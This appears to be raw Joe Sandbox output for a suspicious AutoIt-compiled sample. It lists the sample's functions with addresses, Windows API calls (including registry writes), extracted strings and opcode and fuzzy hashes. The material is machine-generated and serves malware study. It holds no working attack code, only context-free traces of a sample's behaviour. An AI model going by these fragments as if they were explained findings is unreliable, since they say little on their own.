                                                                                        • GetClientRect.USER32(00000000,000000FF), ref: 00EFAA2B
                                                                                        • GetStockObject.GDI32(00000011), ref: 00EFAA47
                                                                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 00EFAA52
                                                                                          • Part of subcall function 00EFB63C: GetCursorPos.USER32(000000FF), ref: 00EFB64F
                                                                                          • Part of subcall function 00EFB63C: ScreenToClient.USER32(00000000,000000FF), ref: 00EFB66C
                                                                                          • Part of subcall function 00EFB63C: GetAsyncKeyState.USER32(00000001), ref: 00EFB691
                                                                                          • Part of subcall function 00EFB63C: GetAsyncKeyState.USER32(00000002), ref: 00EFB69F
                                                                                        • SetTimer.USER32(00000000,00000000,00000028,00EFAB87), ref: 00EFAA79
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                        • String ID: AutoIt v3 GUI
                                                                                        • API String ID: 1458621304-248962490
                                                                                        • Opcode ID: ebbdd9ac7fe13c62395061622789c3dca4d9f552d762770ffd2c247ff352cfb4
                                                                                        • Instruction ID: 240b5492fde0b357f9a64b36249bf48f2ec65bd8f3112dbb6f501e28d52ddc40
                                                                                        • Opcode Fuzzy Hash: ebbdd9ac7fe13c62395061622789c3dca4d9f552d762770ffd2c247ff352cfb4
                                                                                        • Instruction Fuzzy Hash: 83B15EB1A0020E9FDB14DFA8DC45BAE7BB4FB08315F154229FA19EB290DB74E841DB51
                                                                                        Function 00EE2EC0 Relevance: 30.1, APIs: 8, Strings: 9, Instructions: 346COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Foreground
                                                                                        • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                                                        • API String ID: 62970417-1919597938
                                                                                        • Opcode ID: 60a7e7ca714ef6be9554f9dd816e4f65fb2e40a959c26a29017b5c88581e7365
                                                                                        • Instruction ID: dbb84da73c2f7e473318f75a51301e178bbce3c20b2d7af685c70e81519d2650
                                                                                        • Opcode Fuzzy Hash: 60a7e7ca714ef6be9554f9dd816e4f65fb2e40a959c26a29017b5c88581e7365
                                                                                        • Instruction Fuzzy Hash: 4FD11930504686ABDB44EF11C881AAAFBF4BF55350F004A1DF956731A2DB30F99EEB91
                                                                                        Function 00F43639 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F43735
                                                                                        • RegCreateKeyExW.ADVAPI32(?,?,00000000,00F7DC00,00000000,?,00000000,?,?), ref: 00F437A3
                                                                                        • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00F437EB
                                                                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00F43874
                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00F43B94
                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00F43BA1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Close$ConnectCreateRegistryValue
                                                                                        • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                        • API String ID: 536824911-966354055
                                                                                        • Opcode ID: 85b4e43185902ed3150051a966091579114cac0df635b571e7741820d9eba4d4
                                                                                        • Instruction ID: 74b519a19fca4b02729bf47b1a91096ed0b4ff166909a938245229780cf10e1e
                                                                                        • Opcode Fuzzy Hash: 85b4e43185902ed3150051a966091579114cac0df635b571e7741820d9eba4d4
                                                                                        • Instruction Fuzzy Hash: 2A0269756046059FCB14EF25C855A2EBBE5FF88720F04845DF99AAB3A2CB34ED01DB81
                                                                                        Function 00F46BC9 Relevance: 26.5, APIs: 2, Strings: 13, Instructions: 281windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CharUpperBuffW.USER32(?,?), ref: 00F46C56
                                                                                        • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00F46D16
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: BuffCharMessageSendUpper
                                                                                        • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                        • API String ID: 3974292440-719923060
                                                                                        • Opcode ID: 8abf57b682f4bee06c5bdd610a387a48d2785eeef6f299bc21f3ec4adf771dd9
                                                                                        • Instruction ID: 093c1f881e67e7201a59be5a92fee91e063372ddfc3104b8481514bc41f0fdcf
                                                                                        • Opcode Fuzzy Hash: 8abf57b682f4bee06c5bdd610a387a48d2785eeef6f299bc21f3ec4adf771dd9
                                                                                        • Instruction Fuzzy Hash: 0FA181306043859BCB14EF10C851A7AB7E5BF95324F10596DBD96AB3E2DB30EC06EB42
                                                                                        Function 00F1CF50 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetClassNameW.USER32(?,?,00000100), ref: 00F1CF91
                                                                                        • __swprintf.LIBCMT ref: 00F1D032
                                                                                        • _wcscmp.LIBCMT ref: 00F1D045
                                                                                        • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00F1D09A
                                                                                        • _wcscmp.LIBCMT ref: 00F1D0D6
                                                                                        • GetClassNameW.USER32(?,?,00000400), ref: 00F1D10D
                                                                                        • GetDlgCtrlID.USER32(?), ref: 00F1D15F
                                                                                        • GetWindowRect.USER32(?,?), ref: 00F1D195
                                                                                        • GetParent.USER32(?), ref: 00F1D1B3
                                                                                        • ScreenToClient.USER32(00000000), ref: 00F1D1BA
                                                                                        • GetClassNameW.USER32(?,?,00000100), ref: 00F1D234
                                                                                        • _wcscmp.LIBCMT ref: 00F1D248
                                                                                        • GetWindowTextW.USER32(?,?,00000400), ref: 00F1D26E
                                                                                        • _wcscmp.LIBCMT ref: 00F1D282
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
                                                                                        • String ID: %s%u
                                                                                        • API String ID: 3119225716-679674701
                                                                                        • Opcode ID: 5b6c66c40f9638878572850a8dbb0bb3c28a0b29848e80236bd5d660afbced25
                                                                                        • Instruction ID: f76e0ce77b6d526b9730636165878e94cc7f6f4972b32f701199e0e88ed47fe5
                                                                                        • Opcode Fuzzy Hash: 5b6c66c40f9638878572850a8dbb0bb3c28a0b29848e80236bd5d660afbced25
                                                                                        • Instruction Fuzzy Hash: 2EA1D231A04346AFD715DF64C884FEAB7E8FF44364F004519F9A9D2190DB70EA86EBA1
                                                                                        Function 00F1D8A7 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetClassNameW.USER32(00000008,?,00000400), ref: 00F1D8EB
                                                                                        • _wcscmp.LIBCMT ref: 00F1D8FC
                                                                                        • GetWindowTextW.USER32(00000001,?,00000400), ref: 00F1D924
                                                                                        • CharUpperBuffW.USER32(?,00000000), ref: 00F1D941
                                                                                        • _wcscmp.LIBCMT ref: 00F1D95F
                                                                                        • _wcsstr.LIBCMT ref: 00F1D970
                                                                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 00F1D9A8
                                                                                        • _wcscmp.LIBCMT ref: 00F1D9B8
                                                                                        • GetWindowTextW.USER32(00000002,?,00000400), ref: 00F1D9DF
                                                                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 00F1DA28
                                                                                        • _wcscmp.LIBCMT ref: 00F1DA38
                                                                                        • GetClassNameW.USER32(00000010,?,00000400), ref: 00F1DA60
                                                                                        • GetWindowRect.USER32(00000004,?), ref: 00F1DAC9
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                                        • String ID: @$ThumbnailClass
                                                                                        • API String ID: 1788623398-1539354611
                                                                                        • Opcode ID: 7337cc5d23c71e19843cf57c05f12557f9324c010ff14c3fc5b5ee68073f98a8
                                                                                        • Instruction ID: 4282c9899bfae150e153698f4b801da7d76526546416d29ce1cf4d562ed85f17
                                                                                        • Opcode Fuzzy Hash: 7337cc5d23c71e19843cf57c05f12557f9324c010ff14c3fc5b5ee68073f98a8
                                                                                        • Instruction Fuzzy Hash: 5981C4315083499BDB05DF14C881FAA7BF8FF84324F044469FD8A9A096DB74DD85EBA1
                                                                                        Function 00F1D6F4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 104COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: __wcsnicmp
                                                                                        • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                                        • API String ID: 1038674560-1810252412
                                                                                        • Opcode ID: 78e716ffe924e51a81483894eb1994f079b36c1ada824533fe64bac3bb7aed4b
                                                                                        • Instruction ID: 4ac8c05e000bf281778db79664adcb54ed60256a5c628724263da2b51969dc3c
                                                                                        • Opcode Fuzzy Hash: 78e716ffe924e51a81483894eb1994f079b36c1ada824533fe64bac3bb7aed4b
                                                                                        • Instruction Fuzzy Hash: 98314932A48249AAEF14FB51DD43FEEB3F49B20764F200129F441B10D1EB51AA45B692
                                                                                        Function 00F1EA9D Relevance: 25.7, APIs: 17, Instructions: 168windowtimeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LoadIconW.USER32(00000063), ref: 00F1EAB0
                                                                                        • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00F1EAC2
                                                                                        • SetWindowTextW.USER32(?,?), ref: 00F1EAD9
                                                                                        • GetDlgItem.USER32(?,000003EA), ref: 00F1EAEE
                                                                                        • SetWindowTextW.USER32(00000000,?), ref: 00F1EAF4
                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 00F1EB04
                                                                                        • SetWindowTextW.USER32(00000000,?), ref: 00F1EB0A
                                                                                        • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00F1EB2B
                                                                                        • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00F1EB45
                                                                                        • GetWindowRect.USER32(?,?), ref: 00F1EB4E
                                                                                        • SetWindowTextW.USER32(?,?), ref: 00F1EBB9
                                                                                        • GetDesktopWindow.USER32 ref: 00F1EBBF
                                                                                        • GetWindowRect.USER32(00000000), ref: 00F1EBC6
                                                                                        • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 00F1EC12
                                                                                        • GetClientRect.USER32(?,?), ref: 00F1EC1F
                                                                                        • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 00F1EC44
                                                                                        • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00F1EC6F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                                        • String ID:
                                                                                        • API String ID: 3869813825-0
                                                                                        • Opcode ID: 67b9d448a686e02cc7670a6b43f959c198022a75812e5285d8418686b0ddb386
                                                                                        • Instruction ID: 7feb88f8a002883f4d682a102b4ec9ab5d1bedfce885604a8757bc5538a3f4d9
                                                                                        • Opcode Fuzzy Hash: 67b9d448a686e02cc7670a6b43f959c198022a75812e5285d8418686b0ddb386
                                                                                        • Instruction Fuzzy Hash: 29514E71A00709AFDB20DFA9CD89FAEBBF5FF44714F004918E596A25A0C775A944EB10
                                                                                        Function 00F379B0 Relevance: 25.6, APIs: 17, Instructions: 109COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LoadCursorW.USER32(00000000,00007F8A), ref: 00F379C6
                                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 00F379D1
                                                                                        • LoadCursorW.USER32(00000000,00007F03), ref: 00F379DC
                                                                                        • LoadCursorW.USER32(00000000,00007F8B), ref: 00F379E7
                                                                                        • LoadCursorW.USER32(00000000,00007F01), ref: 00F379F2
                                                                                        • LoadCursorW.USER32(00000000,00007F81), ref: 00F379FD
                                                                                        • LoadCursorW.USER32(00000000,00007F88), ref: 00F37A08
                                                                                        • LoadCursorW.USER32(00000000,00007F80), ref: 00F37A13
                                                                                        • LoadCursorW.USER32(00000000,00007F86), ref: 00F37A1E
                                                                                        • LoadCursorW.USER32(00000000,00007F83), ref: 00F37A29
                                                                                        • LoadCursorW.USER32(00000000,00007F85), ref: 00F37A34
                                                                                        • LoadCursorW.USER32(00000000,00007F82), ref: 00F37A3F
                                                                                        • LoadCursorW.USER32(00000000,00007F84), ref: 00F37A4A
                                                                                        • LoadCursorW.USER32(00000000,00007F04), ref: 00F37A55
                                                                                        • LoadCursorW.USER32(00000000,00007F02), ref: 00F37A60
                                                                                        • LoadCursorW.USER32(00000000,00007F89), ref: 00F37A6B
                                                                                        • GetCursorInfo.USER32(?), ref: 00F37A7B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Cursor$Load$Info
                                                                                        • String ID:
                                                                                        • API String ID: 2577412497-0
                                                                                        • Opcode ID: 7b4e4a9bac59e3bca4c9b789f1506964962727bda3ec6ae9bf6b6592127f1ed2
                                                                                        • Instruction ID: 8f286364869b690bb32ea6ed3a2571a794916ed6e61b8ee24145dc8b39cb0fa5
                                                                                        • Opcode Fuzzy Hash: 7b4e4a9bac59e3bca4c9b789f1506964962727bda3ec6ae9bf6b6592127f1ed2
                                                                                        • Instruction Fuzzy Hash: 8E3117B1D0831E6ADF609FB68C8995FBFE8FF04760F50452AE50DE7180DA78A5009FA1
                                                                                        Function 00EEC833 Relevance: 25.0, APIs: 7, Strings: 7, Instructions: 479COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00EFE968: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00EEC8B7,?,00002000,?,?,00000000,?,00EE419E,?,?,?,00F7DC00), ref: 00EFE984
                                                                                          • Part of subcall function 00EE660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00EE53B1,?,?,00EE61FF,?,00000000,00000001,00000000), ref: 00EE662F
                                                                                        • __wsplitpath.LIBCMT ref: 00EEC93E
                                                                                          • Part of subcall function 00F01DFC: __wsplitpath_helper.LIBCMT ref: 00F01E3C
                                                                                        • _wcscpy.LIBCMT ref: 00EEC953
                                                                                        • _wcscat.LIBCMT ref: 00EEC968
                                                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 00EEC978
                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00EECABE
                                                                                          • Part of subcall function 00EEB337: _wcscpy.LIBCMT ref: 00EEB36F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: CurrentDirectory$_wcscpy$FullNamePath__wsplitpath__wsplitpath_helper_wcscat
                                                                                        • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                                        • API String ID: 2258743419-1018226102
                                                                                        • Opcode ID: 63f2bee6bf02ad809ecd2efae876c982bfd3d18961a9fb55748268a04bf66f2b
                                                                                        • Instruction ID: 51e529e110ff27e8fa6879df78c215a775b3bca845710d543a3466a8048cf00a
                                                                                        • Opcode Fuzzy Hash: 63f2bee6bf02ad809ecd2efae876c982bfd3d18961a9fb55748268a04bf66f2b
                                                                                        • Instruction Fuzzy Hash: 1C12C2715083859FC724EF25C841AAFBBE4BF88354F10492DF989A32A1DB30DA49DB53
                                                                                        Function 00F4CE58 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00F4CEFB
                                                                                        • DestroyWindow.USER32(?,?), ref: 00F4CF73
                                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00F4CFF4
                                                                                        • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00F4D016
                                                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00F4D025
                                                                                        • DestroyWindow.USER32(?), ref: 00F4D042
                                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00EE0000,00000000), ref: 00F4D075
                                                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00F4D094
                                                                                        • GetDesktopWindow.USER32 ref: 00F4D0A9
                                                                                        • GetWindowRect.USER32(00000000), ref: 00F4D0B0
                                                                                        • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00F4D0C2
                                                                                        • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00F4D0DA
                                                                                          • Part of subcall function 00EFB526: GetWindowLongW.USER32(?,000000EB), ref: 00EFB537
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memset
                                                                                        • String ID: 0$tooltips_class32
                                                                                        • API String ID: 3877571568-3619404913
                                                                                        • Opcode ID: 9a91547bc492849419e3b17f05a6aa2922e1397a8c4f3de0f76e81625c2cfab2
                                                                                        • Instruction ID: 0203d3d44d1c1e536ecfa11e129e23b3843595d1c807295830023411327fa4c3
                                                                                        • Opcode Fuzzy Hash: 9a91547bc492849419e3b17f05a6aa2922e1397a8c4f3de0f76e81625c2cfab2
                                                                                        • Instruction Fuzzy Hash: 2271DEB4A40309AFD720CF28CC84F6A3BE5FB89714F08451DF985972A1D775E842EB22
                                                                                        Function 00F4F351 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 178windowfileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00EFB34E: GetWindowLongW.USER32(?,000000EB), ref: 00EFB35F
                                                                                        • DragQueryPoint.SHELL32(?,?), ref: 00F4F37A
                                                                                          • Part of subcall function 00F4D7DE: ClientToScreen.USER32(?,?), ref: 00F4D807
                                                                                          • Part of subcall function 00F4D7DE: GetWindowRect.USER32(?,?), ref: 00F4D87D
                                                                                          • Part of subcall function 00F4D7DE: PtInRect.USER32(?,?,00F4ED5A), ref: 00F4D88D
                                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 00F4F3E3
                                                                                        • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00F4F3EE
                                                                                        • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00F4F411
                                                                                        • _wcscat.LIBCMT ref: 00F4F441
                                                                                        • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00F4F458
                                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 00F4F471
                                                                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 00F4F488
                                                                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 00F4F4AA
                                                                                        • DragFinish.SHELL32(?), ref: 00F4F4B1
                                                                                        • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00F4F59C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
